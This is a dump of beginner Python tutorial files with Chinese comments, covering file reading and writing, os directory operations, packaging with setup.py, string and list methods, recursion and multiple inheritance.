writable\n\n\"\"\"关闭文件\"\"\"\nfile.close()\n\n\"\"\"以追加方式写入文件\"\"\"\nfile = open(\"readme.txt\", \"a\")\nfile.write(\"phone:10086\")\nfile.close()\n\n\"\"\"分行读取\"\"\"\nfile = open(\"readme.txt\")\n\nwhile True:\n text3 = file.readline()\n if not text3:\n break\n print(text3)\nfile.close()\n\n\"\"\"小文件的复制,可以一次读取,一次写入\"\"\"\n# 
file1 = open(\"readme.txt\")\n# file2 = open(\"readme[copy].txt\",\"w\") # 只写,文件不存在会自动创建,创建在当前文件夹下\n#\n# text = file1.read()\n# file2.write(text)\n#\n# file1.close()\n# file2.close()\n\n\"\"\"大文件的复制,分行读写\"\"\"\n# file1 = open(\"readme.txt\")\n# file2 = open(\"readme[copy].txt\",\"w\") # 只写,文件不存在会自动创建,创建在当前文件夹下\n#\n# while True:\n# text = file1.readline()\n# if not text:\n# break\n# file2.write(text)\n#\n# file1.close()\n# file2.close()\n\n\"\"\"\n文件/文件夹的相关操作\n要导入os包\n\"\"\"\n\n\"\"\"重命名文件\"\"\"\n# os.rename(\"readme[copy].txt\",\"README[COPY].txt\")\n\n\"\"\"删除文件\"\"\"\n# os.remove(\"README[COPY].txt\")\n\n\"\"\"查看目录下的内容\"\"\"\n# dir_list = os.listdir(\".\")\n# print(dir_list)\n\n\"\"\"判断是否是文件夹\"\"\"\n# print(os.path.isdir(\"ibbie_45_发布模块\")) # True\n# print(os.path.isdir(\"HelloPython.py\")) # False\n\n\"\"\"创建与删除目录\"\"\"\n# os.mkdir(\"test\") # 若文件夹已存在:FileExistsError: [WinError 183] 当文件已存在时,无法创建该文件。: 'test'\n# os.rmdir(\"test\") # 若文件夹不存在:FileNotFoundError: [WinError 2] 系统找不到指定的文件。: 'test'\n\n\"\"\"获取当前目录\"\"\"\ndir_curr = os.getcwd()\nprint(dir_curr)\n" }, { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.5641025900840759, "avg_line_length": 19, "blob_id": "c371c8acbbfa638b290ed5ce84f2e7de52b8c71f", "content_id": "7ba17cd539f74f3c8e6d850e63bb10429781874f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 23, "num_lines": 2, "path": "/ibbie_43_package/test_package2.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "def test43_2():\n print(\"test43_2()\")" }, { "alpha_fraction": 0.645760715007782, "alphanum_fraction": 0.6620209217071533, "avg_line_length": 28.724138259887695, "blob_id": "0262246a769f5fd66923529ae206573a3e045142", "content_id": "332cbcff3d8f90031722ad8f92534c3f0b4d77a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1299, "license_type": 
"no_license", "max_line_length": 68, "num_lines": 29, "path": "/ibbie_45_发布模块/setup.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "from distutils.core import setup\n\"\"\"\n一个发布模块的程序(linux系统)\n 需要在终端执行,并加上build命令,构建模块,会生成build文件夹,里面有打包的模块\n 若发布的模块是针对py2.x,使用python2的解释器(python setup.py build)\n 若发布的模块是针对py3.X,使用python3的解释器(python3 setup.py build)\n 然后再执行 python3 setup.py sdist,生成dist文件夹,里面有tar.gz文件,打包完成\n\"\"\"\nsetup(name=\"test_package_module\", # 包名\n version=\"1.0\", # 版本号\n description=\"just test for package module\", # 描述信息\n long_description=\"测试打包模块\", # 完整描述信息\n author=\"ibbie.yan\", # 作者\n author_email=\"[email protected]\", # 作者邮箱\n url=\"www.ibbie.com\", # 作者网址\n py_modules=[\"ibbie_43_package.test_package\", # 要打包的模块,放进list中\n \"ibbie_43_package.test_package2\"])\n\n\"\"\"\n安装模块(linux系统)\n 解压压缩包:tar -zxvf 发布的那个tar.gz文件\n 安装压缩包:sudo python3 setup.py install\n\"\"\"\n\n\"\"\"\n卸载模块(linux系统)\n 每个模块都有一个内置属性__file__,可以查看文件的位置\n 进入文件夹删除模块相关的文件即可\n\"\"\"" }, { "alpha_fraction": 0.5571733117103577, "alphanum_fraction": 0.6157670617103577, "avg_line_length": 23.92035484313965, "blob_id": "5eddcec5b87e61fbd22e0488898f5e200ba1eeec", "content_id": "b172806bc2335a4e152129b255c6357b345c947b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4234, "license_type": "no_license", "max_line_length": 88, "num_lines": 113, "path": "/ibbie_19_字符串.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n字符串\n 可以用双引号或单引号定义字符串,一般使用双引号\n str = \"abc\"\n 假如字符串中包含双引号,则使用单引号来定义\n str = 'lalala\"啦啦啦\"'\n 可以帮字符串看成是一个列表,列表的每个元素都是一个字符\n 字符串的索引值从0开始\n\"\"\"\n\n\"\"\"定义字符串\"\"\"\nstr1 = \"abc\"\nprint(str1)\nstr2 = '\"哈哈\"'\nprint(str2)\n\n\"\"\"遍历字符串\"\"\"\nstr3 = \"abc123321cba\"\nfor char in str3:\n print(char)\n\n\"\"\"字符串的长度\"\"\"\nprint(len(str3))\n\n\"\"\"统计子字符串在字符串中出现的次数\"\"\"\nprint(str3.count(\"a\"))\nprint(str3.count(\"z\")) # 
没有则返回0\n\n\"\"\"从字符串中查找,并返回索引值\"\"\"\nidx = str3.index(\"123\")\nprint(idx) # 返回的是查找的字符串的第一个字符在字符串中的索引\n# idx2 = str3.index(\"1234\") # 若查找的小字符串不存在,报错:ValueError: substring not found\n\n\"\"\"***********字符串常用方法***********\"\"\"\n\n\"\"\"是否只有空白字符\"\"\"\nempty_str = \"\"\nspace_str = \" \"\nprint(empty_str.isspace()) # False\nprint(space_str.isspace()) # True\n\n\"\"\"是否只包含数字\"\"\"\nnum_str = \"一百一十一\"\nprint(num_str.isdecimal()) # 12.3(×) 123(√) ①(×) 一百一十一(×)\nprint(num_str.isdigit()) # 12.3(×) 123(√) ①(√) 一百一十一(×)\nprint(num_str.isnumeric()) # 12.3(×) 123(√) ①(√) 一百一十一(√)\n\n\"\"\"查找与替换\"\"\"\nhello_str = \"hello world\"\nprint(hello_str.startswith(\"HELLO\")) # False 是否以某字符串开头\nprint(hello_str.endswith(\"world\")) # True 是否以某字符串结尾\n\nprint(hello_str.find(\"llo\")) # 2 查找字符串,返回索引值\nprint(hello_str.find(\"abc\")) # -1 与index不同,找不到也不会报错,会返回-1\n\nprint(hello_str.replace(\"world\", \"python\")) # hello python 替换指定内容,返回替换后的新字符串\nprint(hello_str) # hello world 但是旧字符串不会被改动\n\n\"\"\"文本对齐\"\"\"\npoem = [\"题目\",\n \"作者\",\n \"我是第一行诗\",\n \"我是第二行诗\",\n \"我是第三行诗\",\n \"我是第四行诗\", ]\nfor poem_str in poem:\n print(\"|%s|\" % poem_str.center(10, \"🍔\")) # 居中\n # print(\"|%s|\" % poem_str.center(10,\"**\"))\n # 填充的字符只能是一个字符,否则报错:TypeError: The fill character must be exactly one character long\n\nfor poem_str in poem:\n print(\"|%s|\" % poem_str.ljust(10, \"🍟\")) # 左对齐\n\nfor poem_str in poem:\n print(\"|%s|\" % poem_str.rjust(10, \"🍖\")) # 右对齐\n\n\"\"\"去除空白字符\"\"\"\nspace_str = \" ab| |cdef \"\nprint(space_str.lstrip()) # 去除左边的空白字符\nprint(space_str.rstrip()) # 去除右边的空白字符\nprint(space_str.strip()) # 去除两边的空白字符\n\n\"\"\"拆分和连接\"\"\"\nsplit_str = \"abc*efg*jjj* kkk*ooo\"\nsp1 = split_str.split()\nsp2 = split_str.split(\"*\")\nprint(sp1) # 分割字符,默认以空白字符分割,返回一个list\nprint(sp1) # 分割字符,按指定字符分割,返回一个list2\n\nprint(\"🚗\".join(sp2)) # 连接字符串,用指定字符连接\n\n\"\"\"\n截取字符串\n 字符串有两种索引的方式\n 正序 从第一个字符开始往后:0,1,2,3...\n 倒序 从最后一个字符开始往前:-1,-2,-3...\n 语法:\n string[开始索引:结束索引:步长]\n 开始索引的字符包含在要截取的字符串中\n 
结束索引的字符不包含在要截取的字符串中\n 步长为整数,从左往右走,步长为负数,从右往左走\n\"\"\"\nstr4 = \"012345678\"\nprint(str4[2:5]) # 234 截取索引2到4的字符\nprint(str4[3:]) # 345678 截取索引3到末尾\nprint(str4[:6]) # 012345 截取开头到索引5\nprint(str4[::2]) # 02468 从头到尾,每隔一个取一个字符\nprint(str4[1::2]) # 1357 从索引1开始,每隔一个取一个字符\nprint(str4[2:-1]) # 234567 从索引2开始,取到倒数第二个字符\nprint(str4[-2]) # 7 取倒数第二的字符\nprint(str4[-2:]) # 78 取最后两个字符\nprint(str4[-1::-1]) # 876543210 逆序,从最后一个字符开始,步长-1,即每取一个字符向前移动一格\nprint(str4[::-1]) # 876543210 逆序,步长-1,即每取一个字符向前移动一格\n" }, { "alpha_fraction": 0.6423926949501038, "alphanum_fraction": 0.6586475968360901, "avg_line_length": 17.987653732299805, "blob_id": "c593de4528944eecdd6c30ddeb1d1ccc27517dec", "content_id": "14dec125aeab20e07b96cd3bf0f3d105609fe33b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2048, "license_type": "no_license", "max_line_length": 60, "num_lines": 81, "path": "/ibbie_16_列表.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n列表(list,相当于java中的数组)\n 格式:变量名=[\"hhh\",\"xxx\",\"jjj\",\"aaa\"]\n 索引值从0开始\n 可以存放不同类型的数据,但是通常存放类型相同的数据\n\"\"\"\n\"\"\"创建列表\"\"\"\nname_list = [\"hhh\", \"jjj\", \"jjj\", \"aaa\"]\nprint(name_list)\n\n\"\"\"根据索引取值\"\"\"\nname_list[2]\n# name_list[4] # IndexError: list index out of range\nprint(name_list[2])\n\n\"\"\"根据内容取索引\"\"\"\nname_list.index(\"aaa\")\n# name_list.index(\"111\") # ValueError: '111' is not in list\nprint(name_list.index(\"aaa\"))\n\n\"\"\"修改列表的值\"\"\"\nname_list[0] = \"ibbie\"\nprint(name_list)\n\n\"\"\"在末尾添加一个元素\"\"\"\nname_list.append(\"yan\")\nprint(name_list)\n\n\"\"\"在末尾添加一组元素\"\"\"\ntemp_list = [\"1\",\"2\",\"3\"]\nname_list.extend(temp_list)\nprint(name_list)\n\n\"\"\"在指定索引位置插入元素\"\"\"\nname_list.insert(3, \"doge\")\nprint(name_list)\n\n\"\"\"从列表中删除指定的内容\"\"\"\nname_list.remove(\"jjj\") # 如果要删除的内容有多个,只删除最前面的一个\nprint(name_list)\n\n\"\"\"pop方法删除元素,pop能返回被删除的元素\"\"\"\ntemp = name_list.pop() # 
不传递参数,默认删除最后一个元素,返回被删除元素\nprint(temp)\nprint(name_list)\n\ntemp = name_list.pop(1) # # 传递参数,删除指定索引的元素,返回被删除元素\nprint(temp)\nprint(name_list)\n\n\"\"\"清空列表\"\"\"\nname_list.clear()\nprint(name_list)\n\n\"\"\"列表的长度\"\"\"\nname_list = [\"hhh\", \"jjj\", \"jjj\", \"aaa\"]\nnumber_list = [7, 2, 2, 2, 10, 6]\nprint(len(number_list))\n\n\"\"\"列表中指定内容的个数\"\"\"\nprint(\"列表中元素2出现了 %d 次\" % number_list.count(2))\n\n\"\"\"对列表进行排序\"\"\"\nname_list.sort() # 升序排序\nnumber_list.sort()\nprint(name_list)\nprint(number_list)\n\nname_list.sort(reverse=True) # 降序排序,指定reverse为True\nnumber_list.sort(reverse=True)\nprint(name_list)\nprint(number_list)\n\nname_list.reverse() # 反转列表\nnumber_list.reverse()\nprint(name_list)\nprint(number_list)\n\n\"\"\"迭代列表的元素\"\"\"\nfor name in name_list:\n print(\"我叫 %s\" % name)\n" }, { "alpha_fraction": 0.5111111402511597, "alphanum_fraction": 0.5377777814865112, "avg_line_length": 12.29411792755127, "blob_id": "0a7a0863aff02fc7eeff398a417e2222a7b015c3", "content_id": "c4ca267fb79cb24e8d79ba3493c16b7a03858d02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 47, "num_lines": 17, "path": "/ibbie_25_递归函数.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n递归函数\n 自己调用自己\n 要有出口条件\n\"\"\"\n\n\ndef sum_num(num):\n \"\"\"计算从1到num所有整数的和\"\"\"\n if num == 1: # 出口条件,没有出口条件会死循环\n return 1\n else:\n return num + sum_num(num - 1) # 自己调用自己\n\n\ntotal = sum_num(20)\nprint(total)" }, { "alpha_fraction": 0.603543758392334, "alphanum_fraction": 0.603543758392334, "avg_line_length": 19.522727966308594, "blob_id": "3bce84e369acfa69bb99ffc06dfeea2cc6abf5d4", "content_id": "94be5008c28161692147024379c85fab30c88b71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1249, "license_type": "no_license", "max_line_length": 96, "num_lines": 44, "path": "/ibbie_33_多继承.py", 
"repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n多继承\n 一个类继承多个父类,该类拥有所有父类的属性和方法\n 如果多个父类中有同名方法,会调用继承类列表中,先定义的那个类的方法(要尽量避免这种情况)\n 也要尽量避免使用多继承\n\"\"\"\n\n\nclass A:\n def __init__(self):\n self.a = \"A类的属性\"\n\n def method_a(self):\n print(\"A类的方法\")\n\n def same_name_method(self):\n print(\"A类的same_name_method()\")\n\nclass B:\n def __init__(self):\n self.b = \"B类的属性\"\n\n def method_b(self):\n print(\"B类的方法\")\n\n def same_name_method(self):\n print(\"B类的same_name_method()\")\n\n# class C(B, A):\nclass C(A, B):\n \"\"\"C类继承A类和B类,用逗号分隔\"\"\"\n pass\n\n\nc = C()\nc.method_a()\nc.method_b()\n# print(c.a) # 如果C类的定义是:class C(B, A): 此处会error,AttributeError: 'C' object has no attribute 'a'\n# print(c.b) # 如果C类的定义是:class C(A, B): 此处会error,AttributeError: 'C' object has no attribute 'b'\n\n\"\"\"两个父类都有的方法\"\"\"\n# 如果C类的定义是:class C(B, A): 输出:B类的same_name_method()\n# 如果C类的定义是:class C(A, B): 输出:A类的same_name_method()\nc.same_name_method()\n" } ]
50
ViphouS/fb_webscraping
https://github.com/ViphouS/fb_webscraping
65be7b554e16af52b2575bf108a3ee33566be190
b14be2fb68c675b552330b6789dd656d4d234a6d
ccc75d290a14d36b0f5e881cbde0c11a45ecbfe4
refs/heads/main
2022-12-23T17:15:56.025895
2020-10-02T01:42:37
2020-10-02T01:42:37
300,471,506
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.752136766910553, "alphanum_fraction": 0.8205128312110901, "avg_line_length": 22.399999618530273, "blob_id": "3ff27aac2be1ad32dd8588c7642f10ce5c93cced", "content_id": "f69242705e11f7064577fc33569b9de043c52bda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 117, "license_type": "no_license", "max_line_length": 46, "num_lines": 5, "path": "/README.md", "repo_name": "ViphouS/fb_webscraping", "src_encoding": "UTF-8", "text": "# fb_webscraping\nget html data from facebook by python selenium\npersonal projects\nlearn from youtube\ndate 28/09/2020\n" }, { "alpha_fraction": 0.6954413056373596, "alphanum_fraction": 0.7235693335533142, "avg_line_length": 23.14634132385254, "blob_id": "aa40a60403e973e08063f2a5d785111806c23115", "content_id": "bab858c8046d37f55282f810a1882c635a63dc63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 137, "num_lines": 41, "path": "/fb_bot.py", "repo_name": "ViphouS/fb_webscraping", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\r\n\r\nfrom selenium import webdriver\r\nfrom getpass import getpass\r\nfrom login_info import username, password \r\nfrom time import sleep\r\n\r\nusr = username\r\npwd = password\r\n\r\ninput (\"link 1\")\r\n\r\nopions = webdriver.ChromeOptions()\r\nopions.add_argument('--disable-notifications')\r\ndriver = webdriver.Chrome(options=opions)\r\n\r\ndriver.get('https://www.facebook.com')\r\n\r\nusername_box = driver.find_element_by_id('email')\r\nusername_box.send_keys(username)\r\n\r\npassword_box = driver.find_element_by_id('pass')\r\npassword_box.send_keys(pwd)\r\n\r\nlogin_btn = driver.find_element_by_id('u_0_b')\r\nlogin_btn.submit()\r\n\r\nsleep(3)\r\n\r\ndriver.get(\"https://mbasic.facebook.com/ufi/reaction/profile/browser/fetch/?limit=150&total_count=141&ft_ent_identifier=170515301123900\")\r\n\r\npage 
= driver.page_source\r\nsoup = BeautifulSoup(page, \"html.parser\")\r\nnames = soup.find_all(class_='bj')\r\nsleep(2)\r\n\r\npeople_who_liked_post_1 = []\r\n\r\nfor name in names:\r\n people_who_liked_post_1.append(name.text)\r\nprint(people_who_liked_post_1)\r\n" } ]
2
ronikobrosly/santa_route_optimization
https://github.com/ronikobrosly/santa_route_optimization
96995dfbc59dc9db0d5b0cc53f0a771172e4616c
3a93fbf422e4a3722bf99f00cc1fadb51310f341
4a2c56f51baf795590789360d456f1ee4c4cc216
refs/heads/master
2020-03-21T11:45:02.328451
2018-06-24T22:55:22
2018-06-24T22:55:22
138,520,144
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7976190447807312, "alphanum_fraction": 0.7976190447807312, "avg_line_length": 41, "blob_id": "f05fc7fabc112ea435f55719872e1720c9e423b9", "content_id": "fe7207209491d32db4e8b8c1a0a53756ab2c7f95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 84, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/README.md", "repo_name": "ronikobrosly/santa_route_optimization", "src_encoding": "UTF-8", "text": "# santa_route_optimization\nMy attempt at the \"Santa's Stolen Sleigh\" Kaggle problem\n" }, { "alpha_fraction": 0.6018396615982056, "alphanum_fraction": 0.6373193264007568, "avg_line_length": 21.41176414489746, "blob_id": "9dfda38dc9760755e276f099ebf99f8560fa8ac0", "content_id": "a9be9aacdc14d214ba98793c4bc709d04ef06818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 761, "license_type": "no_license", "max_line_length": 82, "num_lines": 34, "path": "/src/simulated_annealing_example.py", "repo_name": "ronikobrosly/santa_route_optimization", "src_encoding": "UTF-8", "text": "# A simple example of simulated annealing. \n# We're trying to optimize a random walk. Lower values are considered better. \n# After each iteration, it prints the score. It should hopefully drop quite a bit.\n\nimport numpy as np\n\nold = 500\nnew = old\ntemperature = 1.0\ncount = 0\nalpha = 0.9995\niteration_num = 10000\nnp.random.seed(555)\n\n\n# Main while loop\nwhile count < iteration_num:\n temperature *= alpha\n count += 1\n\n rand_delta = np.random.randint(-5, 15)\n new = old + rand_delta\n\n if new < old:\n old = new\n\n else:\n uniform_rand_num = np.random.uniform(0,1)\n p = np.exp(-((new - old)/temperature))\n\n if p > uniform_rand_num:\n old = new\n\n print \"Temperature: {0} \\t Score: {1}\".format(temperature, old)" } ]
2
winwise/sentiment-analysis-vietnamese
https://github.com/winwise/sentiment-analysis-vietnamese
508ed1193a3fab751ad878c4379843e5d4a93ba9
01b7d87af630ba0941e4fd52ae683227b100fff9
0f65e2f6a2cb3109ac3a2ef9770fca92db276c68
refs/heads/master
2020-08-23T02:17:21.853679
2019-10-21T22:58:51
2019-10-21T22:58:51
216,521,986
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6057866215705872, "alphanum_fraction": 0.6657624840736389, "avg_line_length": 33.216495513916016, "blob_id": "230b56234625cc6fefd9393ff47da503e7cdcbb0", "content_id": "3bff096beddde9a353048cc9b1443d30cabf2765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3349, "license_type": "no_license", "max_line_length": 105, "num_lines": 97, "path": "/projectDemo/Classify_test.py", "repo_name": "winwise/sentiment-analysis-vietnamese", "src_encoding": "UTF-8", "text": "from sklearn.datasets import load_files\nimport numpy as np\nimport re\nfrom underthesea import sent_tokenize, word_tokenize\nfrom collections import Counter\nfrom string import punctuation\n\ncorpus = load_files(\"Data\",encoding=\"utf-8\",load_content=True)\nX, y = corpus.data, corpus.target\n# Buoc 1: tien xu ly van ban\ndocuments = []\n# + Viet ham xoa cac the HTML va bieu tuong cam xuc\ndef cleanHTML(text):\n cleaner = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});<.*?>')\n cleantext = re.sub(cleaner,'',text)\n return cleantext\ndef delEmoji(text): \n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" \n u\"\\U0001F300-\\U0001F5FF\" \n u\"\\U0001F680-\\U0001F6FF\" \n u\"\\U0001F1E0-\\U0001F1FF\"\n u\"\\U00002500-\\U00002BEF\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\"\n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\"\n u\"\\u3030\"\n u\"\\xa0\"\n \"]+\", flags=re.UNICODE)\n txt = re.sub(emoji_pattern,'',text)\n txt = txt.replace(\"\\n\",\" \")\n return txt\n# Tien xu ly lan thu nhat, xoa het tat ca cac the HTML va Emoji trong X\ndef tienXuLyLan1(dcmts):\n temp = []\n for cmt in dcmts:\n cmt = cleanHTML(cmt)\n cmt = delEmoji(cmt)\n temp.append(cmt)\n return temp\ndocuments = tienXuLyLan1(X)\n# Tien xu ly lan thu hai, 
loai bo stop words va dau cau, gom nhom cac tu\ndef Vistopwords():\n stop_word = []\n with open(\"Vistopwords.txt\",'r+',encoding=\"utf-8\") as f_read:\n text = f_read.read()\n for word in text.split(\" \"):\n stop_word.append(word)\n f_read.close()\n punc = list(punctuation)\n stop_word = stop_word + punc\n return stop_word\ndef tienXuLyLan2(dcmts):\n sentences = []\n for cmt in dcmts:\n word_cmt = word_tokenize(cmt) # word_cmt la mot list cac tu\n sent = \"\"\n for word in word_cmt:\n if word not in Vistopwords():\n sent = sent + word + \" \"\n sentences.append(sent)\n return sentences\ndocuments = tienXuLyLan2(documents)\n# Buoc 3: Chuyen doi Text thanh Numbers dung The Bag of Words Model\nfrom sklearn.feature_extraction.text import TfidfVectorizer\ntf = TfidfVectorizer(min_df=5,max_df= 0.8,max_features=2000,sublinear_tf=True)\nX = tf.fit_transform(documents).toarray()\n# Training and Testing Sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n# Script phia tren chia du lieu thanh 2 phan 80% tap train va 20% tap test\n# Buoc 5: Su dung LogisticRegression Algorithm de train model\nfrom sklearn.linear_model import LogisticRegression\nmodel = LogisticRegression()\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nprint(confusion_matrix(y_test,y_pred))\nprint(classification_report(y_test,y_pred))\nprint(accuracy_score(y_test, y_pred))\n\n# Thu nghiem ty cho vui thoi\ntxt = [\"quán nấu ăn ngon lắm, hi vọng lần sau sẽ đến nữa\",\"dưới chất lượng cho phép\",\"không hợp vệ sinh\"]\ntxt = tienXuLyLan1(txt)\ntxt = tienXuLyLan2(txt)\nprint(txt)\ntest_txt = tf.transform(txt)\nprint(model.predict(test_txt))" }, { "alpha_fraction": 0.8148148059844971, "alphanum_fraction": 0.8148148059844971, "avg_line_length": 39.5, "blob_id": "03bb7935e5fa8706c5c97d1192dfde70fd649270", "content_id": 
"b6a86018ee68a0e86e23ecfa436ed1603115e626", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 48, "num_lines": 2, "path": "/README.md", "repo_name": "winwise/sentiment-analysis-vietnamese", "src_encoding": "UTF-8", "text": "# sentiment-analysis-vietnamese\nBài toán phân tích cảm xúc tiếng Việt với Python\n" } ]
2
sikadm/sikadm.github.io
https://github.com/sikadm/sikadm.github.io
d9d8c32f3c1aaaf72a2a660ca3c3aca01b9db694
5d173db0c8b28073573707fecf150cf2e042f413
f6554fa0c6671aee2f060a217edeba196edd41e5
refs/heads/master
2020-04-28T02:01:05.370708
2019-04-29T00:03:47
2019-04-29T00:03:47
174,881,846
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5930485129356384, "alphanum_fraction": 0.6089789867401123, "avg_line_length": 19.825397491455078, "blob_id": "0030fb5b882c56aed0b8e82072f3c4ff0b8076a3", "content_id": "97458454c57654f1b2fabf34421ee073d1adf8b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 65, "num_lines": 63, "path": "/fitMatscreen.py", "repo_name": "sikadm/sikadm.github.io", "src_encoding": "UTF-8", "text": "from __future__ import print_function\r\nimport serial, os\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\ncgitb.enable()\r\nform = cgi.FieldStorage() \r\n\r\nser = serial.Serial('COM6', 500000)\r\n\r\nw, h = 138, 48;\r\nmatrix = [[0 for x in range(w)] for y in range(h)]\r\n\r\n\r\ndef generate_data():\r\n\twhile not ord(ser.read()) == 0:\r\n\t\tpass\r\n\tfor y in range(h):\r\n\t\tfor x in range(w):\r\n\t\t\treadByte = ser.read()\r\n\t\t\tif ord(readByte)==0:\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tmatrix[y][x]=ord(readByte)\r\n\tprint('\\n'.join([''.join(['{:4}'.format(item) for item in row]) \r\n for row in matrix]))\r\n\treturn matrix\r\n\t \r\ndef update(data):\r\n mat.set_data(data)\r\n return mat\r\n\t\r\ndef data_gen():\r\n while True:\r\n yield generate_data()\r\n\t\t\r\nfig, ax = plt.subplots()\r\nmat = ax.matshow(generate_data(), vmin=0, vmax=100)\r\nax.autoscale(False)\r\nplt.colorbar(mat)\r\nani = animation.FuncAnimation(fig, update, data_gen)\r\n\r\nplt.show()\r\n\r\nprint(\"Content-type:text/html\\r\\n\\r\\n\")\r\nprint(\"<html>\")\r\nprint(\"<head>\")\r\nprint(\"<title>Fit Mat</title>\")\r\nprint(\"<style></style>\")\r\nprint(\"</head>\")\r\nprint(\"<body>\")\r\nprint(\"<h2 align='center'>Fit Mat sensing data</h2>\")\r\n\r\nprint(\"<form align='right' action='fitMat.html'>\")\r\nprint(\"Return to home page<br>\")\r\nprint(\"<input type='submit' 
value='Home'>\")\r\nprint(\"</form>\")\r\nprint(\"<br>\")\r\n\r\n\r\n\r\nprint(\"</body>\")\r\nprint(\"</html>\")\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6413238048553467, "alphanum_fraction": 0.6556350588798523, "avg_line_length": 31.91176414489746, "blob_id": "f91fdfed1ac05c451ca28899384e835d6b14cbc7", "content_id": "22a04c7ef71fcb5487e6de11644154ddb15383dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1118, "license_type": "no_license", "max_line_length": 83, "num_lines": 34, "path": "/js/calc.js", "repo_name": "sikadm/sikadm.github.io", "src_encoding": "UTF-8", "text": "var remaining;\nfunction remainingBalance() {\n //grab interest rate\n var r = document.getElementById(\"interest-input\").value;\n r = (r / 100) / 12;\n //grab loan amount\n var loan = document.getElementById(\"loan-input\").value;\n //grab number of payments\n var payments = document.getElementById(\"payments-input\").value;\n //grab monthly payment\n var monthly = document.getElementById(\"month-input\").value;\n\n var q = (1+r)** payments;\n remaining = q * loan - ( (q-1) / r ) * monthly;\n\n document.getElementById(\"remaining-amount\").textContent = remaining.toFixed(2);\n}\n\nvar monthly;\nfunction minPayment() {\n //grab interest rate\n var r = document.getElementById(\"interest-input\").value;\n r = (r / 100) / 12;\n //grab loan amount\n var loan = document.getElementById(\"loan-input\").value;\n //grab number of payments\n var payments = document.getElementById(\"payments-input\").value;\n var remaining = loan;\n\n var q = (1+r)** payments;\n monthly = r * ( (q * loan - remaining) / ( q - 1 ));\n\n document.getElementById(\"min-amount\").textContent = monthly.toFixed(2);\n}" }, { "alpha_fraction": 0.6964253187179565, "alphanum_fraction": 0.711917519569397, "avg_line_length": 27.60172462463379, "blob_id": "79fbcd8700e59db97bc5ee971d50b49a7bcc1a9f", "content_id": "6fa4ce118a9c2783f756080c80365941120a88ee", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 16589, "license_type": "no_license", "max_line_length": 181, "num_lines": 580, "path": "/js/budgetQ.js", "repo_name": "sikadm/sikadm.github.io", "src_encoding": "UTF-8", "text": "window.onload = function() {\n\tvar salaryForm = document.getElementById(\"salary\");\n\tvar loanForm = document.getElementById(\"loan\");\n\tvar money = document.getElementById(\"money_tracking\");\n\tvar option1 = document.getElementById(\"option1\");\n\tvar option2 = document.getElementById(\"option2\");\n\tvar option3 = document.getElementById(\"option3\");\n\tvar option4 = document.getElementById(\"option4\");\n\tvar question = document.getElementById(\"question\");\n\tvar bubble = document.getElementById(\"container\");\n\tvar thought = document.getElementById(\"thought\");\n\tvar option1box = document.getElementById(\"box1\");\n\tvar option2box = document.getElementById(\"box2\");\n\tvar option3box = document.getElementById(\"box3\");\n\tvar option4box = document.getElementById(\"box4\");\n\tvar W2form = document.getElementById(\"W2\");\n\tvar form1040 = document.getElementById(\"1040form\");\n\tvar progress = document.getElementById(\"progressbar\");\n\tvar copyright = document.getElementById(\"iconrights\");\n\tvar spendingButton = document.getElementById(\"spendings\");\n\tvar moveButton = document.getElementById(\"move\");\n\tvar marriageButton = 